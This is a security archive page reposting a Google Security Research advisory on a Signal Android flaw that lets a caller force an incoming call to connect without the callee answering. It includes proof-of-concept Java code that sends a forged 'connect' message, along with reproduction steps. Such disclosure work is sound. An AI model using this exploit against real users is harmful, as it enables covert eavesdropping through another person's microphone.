exploit the possibilities

Signal Forced Call Acceptance

Signal Forced Call Acceptance
Posted Oct 5, 2019
Authored by Google Security Research, natashenka

There is a logic error in Signal that can cause an incoming call to be answered even if the callee does not pick it up.

tags | exploit
MD5 | cfd5f34a2c4720cf69df48f6e4d12c1c

Signal Forced Call Acceptance

Change Mirror Download
Signal: Incoming call can be connected without user interaction

There is a logic error in Signal that can cause an incoming call to be answered even if the callee does not pick it up.

In the Android client, there is a method handleCallConnected that causes the call to finish connecting. During normal use, it is called in two situations: when callee device accepts the call when the user selects 'accept', and when the caller device receives an incoming \"connect\" message indicating that the callee has accepted the call. Using a modified client, it is possible to send the \"connect\" message to a callee device when an incoming call is in progress, but has not yet been accepted by the user. This causes the call to be answered, even though the user has not interacted with the device. The connected call will only be an audio call, as the user needs to manually enable video in all calls. The iOS client has a similar logical problem, but the call is not completed due to an error in the UI caused by the unexpected sequence of states. I would recommend improving the logic in both clients, as it is possible the UI problem doesn't occur in all situations.

To reproduce this problem on the Android client, replace the method handleSetMuteAudio in the file WebRtcCallService.java with the following method.

private void handleSetMuteAudio(Intent intent) {

Log.e(TAG, \"SENDING MESSAGE\");

this.dataChannel.send(new DataChannel.Buffer(ByteBuffer.wrap(Data.newBuilder().setConnected(Connected.newBuilder().setId(this.callId)).build().toByteArray()), false));

intent.putExtra(EXTRA_CALL_ID, this.callId);
intent.putExtra(EXTRA_REMOTE_ADDRESS, recipient.getAddress());
handleCallConnected(intent);
}

Then build the client and install it and make a call. When the call is ringing, the audio mute button can be pressed to force the callee device to connect, and audio from the callee device will be audible.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: natashenka@google.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    3 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    11 Files
  • 23
    Oct 23rd
    18 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close